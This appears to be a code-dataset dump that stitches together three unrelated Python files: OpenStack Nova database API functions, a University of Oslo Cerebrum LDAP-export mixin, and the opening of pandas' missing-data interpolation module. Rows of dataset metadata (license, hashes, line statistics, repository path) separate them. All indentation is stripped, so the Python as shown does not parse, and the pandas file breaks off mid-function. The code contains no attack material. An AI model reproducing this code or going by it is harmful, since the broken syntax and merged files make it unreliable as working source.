def task_log_end_task(context, task_name, period_beginning, period_ending,
host, errors, message=None):
values = dict(state="DONE", errors=errors)
if message:
values["message"] = message
session = get_session()
with session.begin():
rows = _task_log_get_query(context, task_name, period_beginning,
period_ending, host, session=session).\
update(values)
if rows == 0:
#It's not running!
raise exception.TaskNotRunning(task_name=task_name, host=host)
def _get_default_deleted_value(table):
# TODO(dripton): It would be better to introspect the actual default value
# from the column, but I don't see a way to do that in the low-level APIs
# of SQLAlchemy 0.7. 0.8 has better introspection APIs, which we should
# use when Nova is ready to require 0.8.
# NOTE(mikal): this is a little confusing. This method returns the value
# that a _not_deleted_ row would have.
deleted_column_type = table.c.deleted.type
if isinstance(deleted_column_type, Integer):
return 0
elif isinstance(deleted_column_type, Boolean):
return False
elif isinstance(deleted_column_type, String):
return ""
else:
return None
@require_admin_context
def archive_deleted_rows_for_table(context, tablename, max_rows):
"""Move up to max_rows rows from one tables to the corresponding
shadow table. The context argument is only used for the decorator.
:returns: number of rows archived
"""
# NOTE(guochbo): There is a circular import, nova.db.sqlalchemy.utils
# imports nova.db.sqlalchemy.api.
from nova.db.sqlalchemy import utils as db_utils
engine = get_engine()
conn = engine.connect()
metadata = MetaData()
metadata.bind = engine
table = Table(tablename, metadata, autoload=True)
default_deleted_value = _get_default_deleted_value(table)
shadow_tablename = _SHADOW_TABLE_PREFIX + tablename
rows_archived = 0
try:
shadow_table = Table(shadow_tablename, metadata, autoload=True)
except NoSuchTableError:
# No corresponding shadow table; skip it.
return rows_archived
if tablename == "dns_domains":
# We have one table (dns_domains) where the key is called
# "domain" rather than "id"
column = table.c.domain
column_name = "domain"
else:
column = table.c.id
column_name = "id"
# NOTE(guochbo): Use InsertFromSelect and DeleteFromSelect to avoid
# database's limit of maximum parameter in one SQL statement.
query_insert = select([table],
table.c.deleted != default_deleted_value).\
order_by(column).limit(max_rows)
query_delete = select([column],
table.c.deleted != default_deleted_value).\
order_by(column).limit(max_rows)
insert_statement = db_utils.InsertFromSelect(shadow_table, query_insert)
delete_statement = db_utils.DeleteFromSelect(table, query_delete, column)
try:
# Group the insert and delete in a transaction.
with conn.begin():
result_insert = conn.execute(insert_statement)
result_delete = conn.execute(delete_statement)
except IntegrityError:
# A foreign key constraint keeps us from deleting some of
# these rows until we clean up a dependent table. Just
# skip this table for now; we'll come back to it later.
msg = _("IntegrityError detected when archiving table %s") % tablename
LOG.warn(msg)
return rows_archived
rows_archived = result_delete.rowcount
return rows_archived
@require_admin_context
def archive_deleted_rows(context, max_rows=None):
"""Move up to max_rows rows from production tables to the corresponding
shadow tables.
:returns: Number of rows archived.
"""
# The context argument is only used for the decorator.
tablenames = []
for model_class in models.__dict__.itervalues():
if hasattr(model_class, "__tablename__"):
tablenames.append(model_class.__tablename__)
rows_archived = 0
for tablename in tablenames:
rows_archived += archive_deleted_rows_for_table(context, tablename,
max_rows=max_rows - rows_archived)
if rows_archived >= max_rows:
break
return rows_archived
####################
def _instance_group_get_query(context, model_class, id_field=None, id=None,
session=None, read_deleted=None):
columns_to_join = {models.InstanceGroup: ['_policies', '_metadata',
'_members']}
query = model_query(context, model_class, session=session,
read_deleted=read_deleted)
for c in columns_to_join.get(model_class, []):
query = query.options(joinedload(c))
if id and id_field:
query = query.filter(id_field == id)
return query
def instance_group_create(context, values, policies=None, metadata=None,
members=None):
"""Create a new group with metadata."""
uuid = values.get('uuid', None)
if uuid is None:
uuid = uuidutils.generate_uuid()
values['uuid'] = uuid
session = get_session()
with session.begin():
try:
group = models.InstanceGroup()
group.update(values)
group.save(session=session)
except db_exc.DBDuplicateEntry:
raise exception.InstanceGroupIdExists(group_uuid=uuid)
# We don't want these to be lazy loaded later. We know there is
# nothing here since we just created this instance group.
group._policies = []
group._metadata = []
group._members = []
if policies:
_instance_group_policies_add(context, group.id, policies,
session=session)
if metadata:
_instance_group_metadata_add(context, group.id, metadata,
session=session)
if members:
_instance_group_members_add(context, group.id, members,
session=session)
return instance_group_get(context, uuid)
def instance_group_get(context, group_uuid):
"""Get a specific group by uuid."""
group = _instance_group_get_query(context,
models.InstanceGroup,
models.InstanceGroup.uuid,
group_uuid).\
first()
if not group:
raise exception.InstanceGroupNotFound(group_uuid=group_uuid)
return group
def instance_group_update(context, group_uuid, values):
"""Update the attributes of an group.
If values contains a metadata key, it updates the aggregate metadata
too. Similarly for the policies and members.
"""
session = get_session()
with session.begin():
group = model_query(context,
models.InstanceGroup,
session=session).\
filter_by(uuid=group_uuid).\
first()
if not group:
raise exception.InstanceGroupNotFound(group_uuid=group_uuid)
policies = values.get('policies')
if policies is not None:
_instance_group_policies_add(context,
group.id,
values.pop('policies'),
set_delete=True,
session=session)
metadata = values.get('metadata')
if metadata is not None:
_instance_group_metadata_add(context,
group.id,
values.pop('metadata'),
set_delete=True,
session=session)
members = values.get('members')
if members is not None:
_instance_group_members_add(context,
group.id,
values.pop('members'),
set_delete=True,
session=session)
group.update(values)
if policies:
values['policies'] = policies
if metadata:
values['metadata'] = metadata
if members:
values['members'] = members
def instance_group_delete(context, group_uuid):
"""Delete an group."""
session = get_session()
with session.begin():
group_id = _instance_group_id(context, group_uuid, session=session)
count = _instance_group_get_query(context,
models.InstanceGroup,
models.InstanceGroup.uuid,
group_uuid,
session=session).soft_delete()
if count == 0:
raise exception.InstanceGroupNotFound(group_uuid=group_uuid)
# Delete policies, metadata and members
instance_models = [models.InstanceGroupPolicy,
models.InstanceGroupMetadata,
models.InstanceGroupMember]
for model in instance_models:
model_query(context, model, session=session).\
filter_by(group_id=group_id).\
soft_delete()
def instance_group_get_all(context):
"""Get all groups."""
return _instance_group_get_query(context, models.InstanceGroup).all()
def instance_group_get_all_by_project_id(context, project_id):
"""Get all groups."""
return _instance_group_get_query(context, models.InstanceGroup).\
filter_by(project_id=project_id).\
all()
def _instance_group_model_get_query(context, model_class, group_id,
session=None, read_deleted='no'):
return model_query(context,
model_class,
read_deleted=read_deleted,
session=session).\
filter_by(group_id=group_id)
def _instance_group_id(context, group_uuid, session=None):
"""Returns the group database ID for the group UUID."""
result = model_query(context,
models.InstanceGroup.id,
base_model=models.InstanceGroup,
session=session).\
filter_by(uuid=group_uuid).\
first()
if not result:
raise exception.InstanceGroupNotFound(group_uuid=group_uuid)
return result.id
def _instance_group_metadata_add(context, id, metadata, set_delete=False,
session=None):
if not session:
session = get_session()
with session.begin(subtransactions=True):
all_keys = metadata.keys()
query = _instance_group_model_get_query(context,
models.InstanceGroupMetadata,
id,
session=session)
if set_delete:
query.filter(~models.InstanceGroupMetadata.key.in_(all_keys)).\
soft_delete(synchronize_session=False)
query = query.filter(models.InstanceGroupMetadata.key.in_(all_keys))
already_existing_keys = set()
for meta_ref in query.all():
key = meta_ref.key
meta_ref.update({'value': metadata[key]})
already_existing_keys.add(key)
for key, value in metadata.iteritems():
if key in already_existing_keys:
continue
meta_ref = models.InstanceGroupMetadata()
meta_ref.update({'key': key,
'value': value,
'group_id': id})
session.add(meta_ref)
return metadata
def instance_group_metadata_add(context, group_uuid, metadata,
set_delete=False):
id = _instance_group_id(context, group_uuid)
return _instance_group_metadata_add(context, id, metadata,
set_delete=set_delete)
def instance_group_metadata_delete(context, group_uuid, key):
id = _instance_group_id(context, group_uuid)
count = _instance_group_get_query(context,
models.InstanceGroupMetadata,
models.InstanceGroupMetadata.group_id,
id).\
filter_by(key=key).\
soft_delete()
if count == 0:
raise exception.InstanceGroupMetadataNotFound(group_uuid=group_uuid,
metadata_key=key)
def instance_group_metadata_get(context, group_uuid):
id = _instance_group_id(context, group_uuid)
rows = model_query(context,
models.InstanceGroupMetadata.key,
models.InstanceGroupMetadata.value,
base_model=models.InstanceGroupMetadata).\
filter_by(group_id=id).all()
return dict((r[0], r[1]) for r in rows)
def _instance_group_members_add(context, id, members, set_delete=False,
session=None):
if not session:
session = get_session()
all_members = set(members)
with session.begin(subtransactions=True):
query = _instance_group_model_get_query(context,
models.InstanceGroupMember,
id,
session=session)
if set_delete:
query.filter(~models.InstanceGroupMember.instance_id.in_(
all_members)).\
soft_delete(synchronize_session=False)
query = query.filter(
models.InstanceGroupMember.instance_id.in_(all_members))
already_existing = set()
for member_ref in query.all():
already_existing.add(member_ref.instance_id)
for instance_id in members:
if instance_id in already_existing:
continue
member_ref = models.InstanceGroupMember()
member_ref.update({'instance_id': instance_id,
'group_id': id})
session.add(member_ref)
return members
def instance_group_members_add(context, group_uuid, members,
set_delete=False):
id = _instance_group_id(context, group_uuid)
return _instance_group_members_add(context, id, members,
set_delete=set_delete)
def instance_group_member_delete(context, group_uuid, instance_id):
id = _instance_group_id(context, group_uuid)
count = _instance_group_get_query(context,
models.InstanceGroupMember,
models.InstanceGroupMember.group_id,
id).\
filter_by(instance_id=instance_id).\
soft_delete()
if count == 0:
raise exception.InstanceGroupMemberNotFound(group_uuid=group_uuid,
instance_id=instance_id)
def instance_group_members_get(context, group_uuid):
id = _instance_group_id(context, group_uuid)
instances = model_query(context,
models.InstanceGroupMember.instance_id,
base_model=models.InstanceGroupMember).\
filter_by(group_id=id).all()
return [instance[0] for instance in instances]
def _instance_group_policies_add(context, id, policies, set_delete=False,
session=None):
if not session:
session = get_session()
allpols = set(policies)
with session.begin(subtransactions=True):
query = _instance_group_model_get_query(context,
models.InstanceGroupPolicy,
id,
session=session)
if set_delete:
query.filter(~models.InstanceGroupPolicy.policy.in_(allpols)).\
soft_delete(synchronize_session=False)
query = query.filter(models.InstanceGroupPolicy.policy.in_(allpols))
already_existing = set()
for policy_ref in query.all():
already_existing.add(policy_ref.policy)
for policy in policies:
if policy in already_existing:
continue
policy_ref = models.InstanceGroupPolicy()
policy_ref.update({'policy': policy,
'group_id': id})
session.add(policy_ref)
return policies
def instance_group_policies_add(context, group_uuid, policies,
set_delete=False):
id = _instance_group_id(context, group_uuid)
return _instance_group_policies_add(context, id, policies,
set_delete=set_delete)
def instance_group_policy_delete(context, group_uuid, policy):
id = _instance_group_id(context, group_uuid)
count = _instance_group_get_query(context,
models.InstanceGroupPolicy,
models.InstanceGroupPolicy.group_id,
id).\
filter_by(policy=policy).\
soft_delete()
if count == 0:
raise exception.InstanceGroupPolicyNotFound(group_uuid=group_uuid,
policy=policy)
def instance_group_policies_get(context, group_uuid):
id = _instance_group_id(context, group_uuid)
policies = model_query(context,
models.InstanceGroupPolicy.policy,
base_model=models.InstanceGroupPolicy).\
filter_by(group_id=id).all()
return [policy[0] for policy in policies]
####################
@require_admin_context
def pci_device_get_by_addr(context, node_id, dev_addr):
pci_dev_ref = model_query(context, models.PciDevice).\
filter_by(compute_node_id=node_id).\
filter_by(address=dev_addr).\
first()
if not pci_dev_ref:
raise exception.PciDeviceNotFound(node_id=node_id, address=dev_addr)
return pci_dev_ref
@require_admin_context
def pci_device_get_by_id(context, id):
pci_dev_ref = model_query(context, models.PciDevice).\
filter_by(id=id).\
first()
if not pci_dev_ref:
raise exception.PciDeviceNotFoundById(id=id)
return pci_dev_ref
@require_admin_context
def pci_device_get_all_by_node(context, node_id):
return model_query(context, models.PciDevice).\
filter_by(compute_node_id=node_id).\
all()
@require_context
def pci_device_get_all_by_instance_uuid(context, instance_uuid):
return model_query(context, models.PciDevice).\
filter_by(status='allocated').\
filter_by(instance_uuid=instance_uuid).\
all()
def _instance_pcidevs_get_multi(context, instance_uuids, session=None):
return model_query(context, models.PciDevice, session=session).\
filter_by(status='allocated').\
filter(models.PciDevice.instance_uuid.in_(instance_uuids))
@require_admin_context
def pci_device_destroy(context, node_id, address):
result = model_query(context, models.PciDevice).\
filter_by(compute_node_id=node_id).\
filter_by(address=address).\
soft_delete()
if not result:
raise exception.PciDeviceNotFound(node_id=node_id, address=address)
@require_admin_context
def pci_device_update(context, node_id, address, values):
session = get_session()
with session.begin():
device = model_query(context, models.PciDevice, session=session,
read_deleted="no").\
filter_by(compute_node_id=node_id).\
filter_by(address=address).\
first()
if not device:
device = models.PciDevice()
device.update(values)
session.add(device)
return device
|
apache-2.0
| -2,111,573,966,483,229,000
| 35.335143
| 79
| 0.574421
| false
| 4.287253
| false
| false
| false
|
unioslo/cerebrum
|
Cerebrum/modules/no/uio/OrgLDIF.py
|
1
|
15602
|
# -*- coding: utf-8 -*-
# Copyright 2004-2014 University of Oslo, Norway
#
# This file is part of Cerebrum.
#
# Cerebrum is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Cerebrum is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Cerebrum; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
from __future__ import unicode_literals
import re
import pickle
from os.path import join as join_paths
from collections import defaultdict
import cereconf
from Cerebrum.modules.no.OrgLDIF import norEduLDIFMixin
from Cerebrum.modules.OrgLDIF import postal_escape_re
from Cerebrum.modules.LDIFutils import (
ldapconf, normalize_string, hex_escape_match,
normalize_IA5String, verify_IA5String,
)
from Cerebrum.Utils import make_timer
# Replace these characters with spaces in OU RDNs.
ou_rdn2space_re = re.compile('[#\"+,;<>\\\\=\0\\s]+')
class OrgLDIFUiOMixin(norEduLDIFMixin):
"""Mixin class for norEduLDIFMixin(OrgLDIF) with UiO modifications."""
def __init__(self, db, logger):
self.__super.__init__(db, logger)
self.attr2syntax['mobile'] = self.attr2syntax['telephoneNumber']
self.attr2syntax['uioVisiblePrivateMobile'] = \
self.attr2syntax['mobile']
self.attr2syntax['uioPrimaryMail'] = (None, verify_IA5String,
normalize_IA5String),
self.ou_quarantined = {}
def init_ou_dump(self):
self.__super.init_ou_dump()
self.get_ou_quarantines()
ou2parent = dict((c, p)
for p, ous in self.ou_tree.items()
for c in ous)
class Id2ou(dict):
# For missing id2ous, cache and return nearest parent or None
def __missing__(self, key):
val = self[key] = self[ou2parent.get(key)]
return val
self.ou_id2ou_uniq_id = Id2ou(self.ou_id2ou_uniq_id)
self.ou_id2ou_uniq_id.setdefault(None, None)
def test_omit_ou(self):
return (not self.ou.has_spread(self.const.spread_ou_publishable)) or \
self.ou_quarantined.get(self.ou.entity_id, False)
def get_ou_quarantines(self):
for row in self.ou.list_entity_quarantines(
entity_types=self.const.entity_ou,
quarantine_types=self.const.quarantine_ou_notvalid,
only_active=True):
self.ou_quarantined[int(row['entity_id'])] = True
def init_attr2id2contacts(self):
# Change from superclass: Include 'mobile' as well.
contact_source = getattr(self.const,
cereconf.LDAP['contact_source_system'])
contacts = [(attr, self.get_contacts(
contact_type=contact_type,
source_system=source_system,
convert=self.attr2syntax[attr][0],
verify=self.attr2syntax[attr][1],
normalize=self.attr2syntax[attr][2]))
for attr, source_system, contact_type in (
('telephoneNumber', contact_source, self.const.contact_phone),
('mobile', contact_source, self.const.contact_mobile_phone),
('uioVisiblePrivateMobile', contact_source,
self.const.contact_private_mobile_visible),
('facsimileTelephoneNumber', contact_source,
self.const.contact_fax),
('labeledURI', None, self.const.contact_url))]
self.id2labeledURI = contacts[-1][1]
self.attr2id2contacts = [v for v in contacts if v[1]]
def make_address(self, sep,
p_o_box, address_text, postal_number, city, country):
# Changes from superclass:
# Weird algorithm for when to use p_o_box.
# Append "Blindern" to postbox.
if country:
country = self.const.Country(country).country
if (p_o_box and int(postal_number or 0) / 100 == 3):
address_text = "Pb. %s - Blindern" % p_o_box
else:
address_text = (address_text or "").strip()
post_nr_city = None
if city or (postal_number and country):
post_nr_city = " ".join(filter(None, (postal_number,
(city or "").strip())))
val = "\n".join(filter(None, (address_text, post_nr_city, country)))
if sep == '$':
val = postal_escape_re.sub(hex_escape_match, val)
return val.replace("\n", sep)
def init_person_course(self):
"""Populate dicts with a person's course information."""
timer = make_timer(self.logger, 'Processing person courses...')
self.ownerid2urnlist = pickle.load(file(
join_paths(ldapconf(None, 'dump_dir'), "ownerid2urnlist.pickle")))
timer("...person courses done.")
def init_person_groups(self):
"""Populate dicts with a person's group information."""
timer = make_timer(self.logger, 'Processing person groups...')
self.person2group = pickle.load(file(
join_paths(ldapconf(None, 'dump_dir'), "personid2group.pickle")))
timer("...person groups done.")
def init_person_dump(self, use_mail_module):
"""Supplement the list of things to run before printing the
list of people."""
self.__super.init_person_dump(use_mail_module)
self.init_person_course()
self.init_person_groups()
def init_person_titles(self):
# Change from original: Search titles first by system_lookup_order,
# then within each system let personal title override work title.
timer = make_timer(self.logger, 'Fetching personal titles...')
titles = defaultdict(dict)
for name_type in (self.const.personal_title, self.const.work_title):
for row in self.person.search_name_with_language(
entity_type=self.const.entity_person,
name_variant=name_type,
name_language=self.languages):
titles[int(row['entity_id'])].setdefault(
int(row['name_language']), row['name'])
self.person_titles = dict([(p_id, t.items())
for p_id, t in titles.items()])
timer("...personal titles done.")
def init_account_mail(self, use_mail_module):
u""" Cache account mail addresses.
This method adds to the general to fill the primary email attribute
This is done to prepare for changing the normal email attribute
:param bool use_mail_module:
If True, Cerebrum.modules.Email will be used to populate this
cache; otherwise the `self.account_mail` dict will be None.
"""
super(OrgLDIFUiOMixin, self).init_account_mail(use_mail_module)
if use_mail_module:
timer = make_timer(
self.logger,
"Doing UiO specific changes to account e-mail addresses...")
self.account_primary_mail = self.account_mail.copy()
# We don't want to import this if mod_email isn't present.
from Cerebrum.modules.Email import EmailTarget
targets = EmailTarget(self.db).list_email_target_addresses
mail = {}
for row in targets(target_type=self.const.email_target_account,
domain='uio.no', uname_local=True):
# Can only return username@uio.no so no need for any checks
mail[int(row['target_entity_id'])] = "@".join(
(row['local_part'], row['domain']))
self.account_mail.update(mail)
timer("...UiO specfic account e-mail addresses done.")
def make_uioPersonScopedAffiliation(self, p_id, pri_aff, pri_ou):
# [primary|secondary]:<affiliation>@<status>/<stedkode>
ret = []
pri_aff_str, pri_status_str = pri_aff
for aff, status, ou in self.affiliations[p_id]:
# populate the caches
if aff in self.aff_cache:
aff_str = self.aff_cache[aff]
else:
aff_str = str(self.const.PersonAffiliation(aff))
self.aff_cache[aff] = aff_str
if status in self.status_cache:
status_str = self.status_cache[status]
else:
status_str = str(self.const.PersonAffStatus(status).str)
self.status_cache[status] = status_str
p = 'secondary'
if (aff_str == pri_aff_str and
status_str == pri_status_str and ou == pri_ou):
p = 'primary'
ou = self.ou_id2ou_uniq_id[ou]
if ou:
ret.append(''.join((p, ':', aff_str, '/', status_str, '@',
ou)))
return ret
def make_person_entry(self, row, person_id):
""" Extend with UiO functionality. """
dn, entry, alias_info = self.__super.make_person_entry(row, person_id)
account_id = int(row['account_id'])
if not dn:
return dn, entry, alias_info
# Add or extend entitlements
if person_id in self.ownerid2urnlist:
urnlist = self.ownerid2urnlist[person_id]
if 'eduPersonEntitlement' in entry:
entry['eduPersonEntitlement'].update(urnlist)
else:
entry['eduPersonEntitlement'] = set(urnlist)
# Add person ID
entry['uioPersonId'] = str(person_id)
# Add group memberships
if person_id in self.person2group:
entry['uioMemberOf'] = self.person2group[person_id]
entry['objectClass'].append('uioMembership')
# Add scoped affiliations
pri_edu_aff, pri_ou, pri_aff = self.make_eduPersonPrimaryAffiliation(
person_id)
entry['uioPersonScopedAffiliation'] = \
self.make_uioPersonScopedAffiliation(person_id, pri_aff, pri_ou)
# uio attributes require uioPersonObject
entry['objectClass'].append('uioPersonObject')
# Check if there exists «avvikende» (deviant) addresses.
# If so, export them instead.
addrs = self.addr_info.get(person_id)
post = addrs and addrs.get(int(self.const.address_other_post))
if post:
a_txt, p_o_box, p_num, city, country = post
post = self.make_address("$", p_o_box, a_txt, p_num, city, country)
if post:
entry['postalAddress'] = (post,)
street = addrs and addrs.get(int(self.const.address_other_street))
if street:
a_txt, p_o_box, p_num, city, country = street
street = self.make_address(", ", None, a_txt, p_num, city, country)
if street:
entry['street'] = (street,)
if self.account_primary_mail:
mail = self.account_primary_mail.get(account_id)
if mail:
entry['uioPrimaryMail'] = mail
return dn, entry, alias_info
def _calculate_edu_OUs(self, p_ou, s_ous):
return s_ous
def init_person_selections(self, *args, **kwargs):
""" Extend with UiO settings for person selections.
This is especially for `no.uio.OrgLDIF.is_person_visible()`, as UiO has
some special needs in how to interpret visibility of persons due to
affiliations for reservation and consent, which behaves differently in
SAPUiO and FS.
"""
self.__super.init_person_selections(*args, **kwargs)
# Set what affiliations that should be checked for visibility from SAP
# and FS. The default is to set the person to NOT visible, which
# happens for all persons that doesn't have _any_ of the affiliations
# defined here.
self.visible_sap_affs = (int(self.const.affiliation_ansatt),)
tilkn_aff = int(self.const.affiliation_tilknyttet)
self.visible_sap_statuses = (
(tilkn_aff, int(self.const.affiliation_tilknyttet_ekst_stip)),
(tilkn_aff, int(self.const.affiliation_tilknyttet_frida_reg)),
(tilkn_aff, int(self.const.affiliation_tilknyttet_innkjoper)),
(tilkn_aff, int(self.const.
affiliation_tilknyttet_assosiert_person)),
(tilkn_aff, int(self.const.affiliation_tilknyttet_ekst_forsker)),
(tilkn_aff, int(self.const.affiliation_tilknyttet_emeritus)),
(tilkn_aff, int(self.const.affiliation_tilknyttet_gjesteforsker)),
(tilkn_aff, int(self.const.affiliation_tilknyttet_bilag)),
(tilkn_aff, int(self.const.affiliation_tilknyttet_ekst_partner)),
)
student = int(self.const.affiliation_student)
self.fs_aff_statuses = (
(student, int(self.const.affiliation_status_student_aktiv)),
(student, int(self.const.affiliation_status_student_drgrad)),
(student, int(self.const.affiliation_status_student_emnestud)))
self.sap_res = self.init_person_group("SAP-elektroniske-reservasjoner")
self.fs_samtykke = self.init_person_group("FS-aktivt-samtykke")
def is_person_visible(self, person_id):
""" Override with UiO specific visibility.
At UiO, visibility is controlled differently depending on what source
system the person is from. SAPUiO has reservations, while FS has active
consents. Since we don't fetch source systems per affiliation from
Cerebrum in `OrgLDIF`, we only guess.
The reason for this override, is to support priority. SAP has priority
over FS, which can't be implemented through the configuration as of
today.
Note that the settings in `cereconf.LDAP_PERSON['visible_selector']` is
ignored by this override. The list of affiliations are hardcoded in the
method `init_person_selections`.
"""
# TODO: this could be changed to check the trait 'reserve_public'
# later, so we don't have to check group memberships.
#
# The trait behaves in the following manner:
# Every person should be 'invisible', except if:
# * The person has a trait of the type 'reserve_public', and
# * The trait's numval is set to 0
# This means that a missing trait should be considered as a
# reservation.
p_affs = self.affiliations[person_id]
# If there is an affiliation from SAP then consider
# reservations/permissions from SAP only.
for (aff, status, ou) in p_affs:
if aff in self.visible_sap_affs:
return person_id not in self.sap_res
if (aff, status) in self.visible_sap_statuses:
return person_id not in self.sap_res
# Otherwise, if there is an affiliaton STUDENT/<aktiv, emnestud or drgrad>,
# check for permission from FS to make the person visible.
for (aff, status, ou) in p_affs:
if (aff, status) in self.fs_aff_statuses:
return person_id in self.fs_samtykke
# Otherwise hide the person.
return False
|
gpl-2.0
| -9,183,215,164,680,836,000
| 43.69914
| 83
| 0.604744
| false
| 3.762663
| false
| false
| false
|
cbertinato/pandas
|
pandas/core/missing.py
|
1
|
23588
|
"""
Routines for filling missing data.
"""
import operator
import numpy as np
from pandas._libs import algos, lib
from pandas.compat._optional import import_optional_dependency
from pandas.core.dtypes.cast import infer_dtype_from_array
from pandas.core.dtypes.common import (
ensure_float64, is_datetime64_dtype, is_datetime64tz_dtype, is_float_dtype,
is_integer, is_integer_dtype, is_numeric_v_string_like, is_scalar,
is_timedelta64_dtype, needs_i8_conversion)
from pandas.core.dtypes.missing import isna
def mask_missing(arr, values_to_mask):
"""
Return a masking array of same size/shape as arr
with entries equaling any member of values_to_mask set to True
"""
dtype, values_to_mask = infer_dtype_from_array(values_to_mask)
try:
values_to_mask = np.array(values_to_mask, dtype=dtype)
except Exception:
values_to_mask = np.array(values_to_mask, dtype=object)
na_mask = isna(values_to_mask)
nonna = values_to_mask[~na_mask]
mask = None
for x in nonna:
if mask is None:
# numpy elementwise comparison warning
if is_numeric_v_string_like(arr, x):
mask = False
else:
mask = arr == x
# if x is a string and arr is not, then we get False and we must
# expand the mask to size arr.shape
if is_scalar(mask):
mask = np.zeros(arr.shape, dtype=bool)
else:
# numpy elementwise comparison warning
if is_numeric_v_string_like(arr, x):
mask |= False
else:
mask |= arr == x
if na_mask.any():
if mask is None:
mask = isna(arr)
else:
mask |= isna(arr)
# GH 21977
if mask is None:
mask = np.zeros(arr.shape, dtype=bool)
return mask
def clean_fill_method(method, allow_nearest=False):
# asfreq is compat for resampling
if method in [None, 'asfreq']:
return None
if isinstance(method, str):
method = method.lower()
if method == 'ffill':
method = 'pad'
elif method == 'bfill':
method = 'backfill'
valid_methods = ['pad', 'backfill']
expecting = 'pad (ffill) or backfill (bfill)'
if allow_nearest:
valid_methods.append('nearest')
expecting = 'pad (ffill), backfill (bfill) or nearest'
if method not in valid_methods:
msg = ('Invalid fill method. Expecting {expecting}. Got {method}'
.format(expecting=expecting, method=method))
raise ValueError(msg)
return method
def clean_interp_method(method, **kwargs):
order = kwargs.get('order')
valid = ['linear', 'time', 'index', 'values', 'nearest', 'zero', 'slinear',
'quadratic', 'cubic', 'barycentric', 'polynomial', 'krogh',
'piecewise_polynomial', 'pchip', 'akima', 'spline',
'from_derivatives']
if method in ('spline', 'polynomial') and order is None:
raise ValueError("You must specify the order of the spline or "
"polynomial.")
if method not in valid:
raise ValueError("method must be one of {valid}. Got '{method}' "
"instead.".format(valid=valid, method=method))
return method
def interpolate_1d(xvalues, yvalues, method='linear', limit=None,
limit_direction='forward', limit_area=None, fill_value=None,
bounds_error=False, order=None, **kwargs):
"""
Logic for the 1-d interpolation. The result should be 1-d, inputs
xvalues and yvalues will each be 1-d arrays of the same length.
Bounds_error is currently hardcoded to False since non-scipy ones don't
take it as an argument.
"""
# Treat the original, non-scipy methods first.
invalid = isna(yvalues)
valid = ~invalid
if not valid.any():
# have to call np.asarray(xvalues) since xvalues could be an Index
# which can't be mutated
result = np.empty_like(np.asarray(xvalues), dtype=np.float64)
result.fill(np.nan)
return result
if valid.all():
return yvalues
if method == 'time':
if not getattr(xvalues, 'is_all_dates', None):
# if not issubclass(xvalues.dtype.type, np.datetime64):
raise ValueError('time-weighted interpolation only works '
'on Series or DataFrames with a '
'DatetimeIndex')
method = 'values'
valid_limit_directions = ['forward', 'backward', 'both']
limit_direction = limit_direction.lower()
if limit_direction not in valid_limit_directions:
msg = ('Invalid limit_direction: expecting one of {valid!r}, '
'got {invalid!r}.')
raise ValueError(msg.format(valid=valid_limit_directions,
invalid=limit_direction))
if limit_area is not None:
valid_limit_areas = ['inside', 'outside']
limit_area = limit_area.lower()
if limit_area not in valid_limit_areas:
raise ValueError('Invalid limit_area: expecting one of {}, got '
'{}.'.format(valid_limit_areas, limit_area))
# default limit is unlimited GH #16282
if limit is None:
# limit = len(xvalues)
pass
elif not is_integer(limit):
raise ValueError('Limit must be an integer')
elif limit < 1:
raise ValueError('Limit must be greater than 0')
from pandas import Series
ys = Series(yvalues)
# These are sets of index pointers to invalid values... i.e. {0, 1, etc...
all_nans = set(np.flatnonzero(invalid))
start_nans = set(range(ys.first_valid_index()))
end_nans = set(range(1 + ys.last_valid_index(), len(valid)))
mid_nans = all_nans - start_nans - end_nans
# Like the sets above, preserve_nans contains indices of invalid values,
# but in this case, it is the final set of indices that need to be
# preserved as NaN after the interpolation.
# For example if limit_direction='forward' then preserve_nans will
# contain indices of NaNs at the beginning of the series, and NaNs that
# are more than'limit' away from the prior non-NaN.
# set preserve_nans based on direction using _interp_limit
if limit_direction == 'forward':
preserve_nans = start_nans | set(_interp_limit(invalid, limit, 0))
elif limit_direction == 'backward':
preserve_nans = end_nans | set(_interp_limit(invalid, 0, limit))
else:
# both directions... just use _interp_limit
preserve_nans = set(_interp_limit(invalid, limit, limit))
# if limit_area is set, add either mid or outside indices
# to preserve_nans GH #16284
if limit_area == 'inside':
# preserve NaNs on the outside
preserve_nans |= start_nans | end_nans
elif limit_area == 'outside':
# preserve NaNs on the inside
preserve_nans |= mid_nans
# sort preserve_nans and covert to list
preserve_nans = sorted(preserve_nans)
xvalues = getattr(xvalues, 'values', xvalues)
yvalues = getattr(yvalues, 'values', yvalues)
result = yvalues.copy()
if method in ['linear', 'time', 'index', 'values']:
if method in ('values', 'index'):
inds = np.asarray(xvalues)
# hack for DatetimeIndex, #1646
if needs_i8_conversion(inds.dtype.type):
inds = inds.view(np.int64)
if inds.dtype == np.object_:
inds = lib.maybe_convert_objects(inds)
else:
inds = xvalues
result[invalid] = np.interp(inds[invalid], inds[valid], yvalues[valid])
result[preserve_nans] = np.nan
return result
sp_methods = ['nearest', 'zero', 'slinear', 'quadratic', 'cubic',
'barycentric', 'krogh', 'spline', 'polynomial',
'from_derivatives', 'piecewise_polynomial', 'pchip', 'akima']
if method in sp_methods:
inds = np.asarray(xvalues)
# hack for DatetimeIndex, #1646
if issubclass(inds.dtype.type, np.datetime64):
inds = inds.view(np.int64)
result[invalid] = _interpolate_scipy_wrapper(inds[valid],
yvalues[valid],
inds[invalid],
method=method,
fill_value=fill_value,
bounds_error=bounds_error,
order=order, **kwargs)
result[preserve_nans] = np.nan
return result
def _interpolate_scipy_wrapper(x, y, new_x, method, fill_value=None,
bounds_error=False, order=None, **kwargs):
"""
Passed off to scipy.interpolate.interp1d. method is scipy's kind.
Returns an array interpolated at new_x. Add any new methods to
the list in _clean_interp_method.
"""
extra = '{method} interpolation requires SciPy.'.format(method=method)
import_optional_dependency('scipy', extra=extra)
from scipy import interpolate
new_x = np.asarray(new_x)
# ignores some kwargs that could be passed along.
alt_methods = {
'barycentric': interpolate.barycentric_interpolate,
'krogh': interpolate.krogh_interpolate,
'from_derivatives': _from_derivatives,
'piecewise_polynomial': _from_derivatives,
}
if getattr(x, 'is_all_dates', False):
# GH 5975, scipy.interp1d can't hande datetime64s
